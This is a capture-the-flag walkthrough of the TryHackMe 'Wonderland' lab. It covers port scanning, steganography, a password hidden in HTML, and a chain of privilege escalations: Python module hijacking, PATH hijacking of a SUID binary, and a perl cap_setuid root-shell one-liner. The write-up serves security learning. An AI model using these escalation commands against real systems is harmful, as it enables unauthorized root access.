Wonderland
These notes are from a challenge I did @tryhackme called wonderland.
First Checks
Let's scan for open ports first: nmap -sC -sV 10.10.28.31
Nmap output
Nmap scan report for 10.10.28.31
Host is up (0.075s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds
Let's search for paths on the webpage on port 80: gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.28.31:80
Gobuster output
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.28.31:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/10/21 16:46:38 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/r (Status: 301) [Size: 0] [--> r/]
/poem (Status: 301) [Size: 0] [--> poem/]
Steganography
Looking at http://10.10.28.31/img/ we see the following files:
- alice_door.jpg
- alice_door.png
- white_rabbit_1.jpg
Let's download them all:
wget http://10.10.28.31/img/alice_door.jpg
wget http://10.10.28.31/img/alice_door.png
wget http://10.10.28.31/img/white_rabbit_1.jpg
and run steghide...
Unfortunately alice_door.jpg and alice_door.png don't show any result (at least not without a passphrase...) but white_rabbit_1.jpg seems promissing:
steghide extract -sf white_rabbit_1.jpg -p ''
the file "hint.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t
The hint means to follow this path: http://10.10.28.31/r/a/b/b/i/t/
Viewing the HTML code we see:
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
Login as alice
Let's try to login using those credentials: ssh alice@10.10.28.31
SSH login output
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Oct 21 19:14:20 UTC 2021
System load: 0.0 Processes: 85
Usage of /: 18.9% of 19.56GB Users logged in: 0
Memory usage: 31% IP address for eth0: 10.10.28.31
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Mon May 25 16:37:21 2020 from 192.168.170.1
It is strange to see root.txt in the folder of alice.find ./ -type f -iname "user.txt" doesn't reveal anything. The hint "Everything is upside down here." means if root.txt is here, maybe user.txt is under /root. We can directly read user.txt by runningcat /root/user.txt. lol...
Escalate privileges to rabbit
We see walrus_and_the_carpenter.py imports and calls random to get 10 random lines from the alice in wonderland lyrics stored in the file:
import random
[...]
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)a
Running sudo -l shows we can run walrus_and_the_carpenter.py as rabbit:
SSH login output
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
To escalate privileges we can misuse the fact that we can run walrus_and_the_carpenter.py by creating our own random.py with the following content to overwrite the random function imported and called in walrus_and_the_carpenter.py
import os
def choice(argument):
os.system("/bin/bash")
Running walrus_and_the_carpenter.py with our random.py will now give us prompt as rabbit:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Tea Party
As rabbit we see the following files in home:
drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
Running teaParty we get the following:
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 21 Oct 2021 20:39:50 +0000
Ask very nicely, and I will give you some tea while you wait for him
Let's copy teaParty to the kali machine and view it in detail with strings teaParty:
Serving teaParty to my kali machine
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.9.193.173 - - [21/Oct/2021 19:59:25] "GET /teaParty HTTP/1.1" 200 -
Downloading teaParty file
wget 10.10.28.31:8000/teaParty
--2021-10-21 15:59:24-- http://10.10.28.31:8000/teaParty
Connecting to 10.10.28.31:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16816 (16K) [application/octet-stream]
Saving to: ‘teaParty’
teaParty 100%[========================================>] 16.42K --.-KB/s in 0.02s
2021-10-21 15:59:24 (895 KB/s) - ‘teaParty’ saved [16816/16816]
Runstrings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
We see the program calls date in this line: /bin/echo -n 'Probably by ' && date --date='next hour' -R. Just like with "random" from above, let's create our own date file e.g.:
#!/bin/sh
bash
Now, let's change the file to be executable by everyone: chmod +x date and add it to the path variables: PATH=/home/rabbit:$PATH
If we now execute ./teaParty we get a shell as hatter:
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
We can see the hatter password in /home/hatter/password.txt
Login as hatter
Since we have the user name and password, let' us login with ssh: ssh hatter@10.10.28.31
sudo -l, find / -perm -u=s -type f 2>/dev/null and find / -xdev -user hatter 2>/dev/null don't reveal any interesting output but find / -xdev -group hatter 2>/dev/null shows group hatter owns perl. Unfortunately sudo is not possible and the suid bit isn’t set on the perl executable.
There is another thing we can check: With getcap -r / 2>/dev/null we can check for "capabilities" and we see perl in the list:
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
Let's run a perl script misusing the capabilities from GTOBins: "If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID."
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
We are now root and can read the root.txt in the home folder of alice:
cat /home/alice/root.txt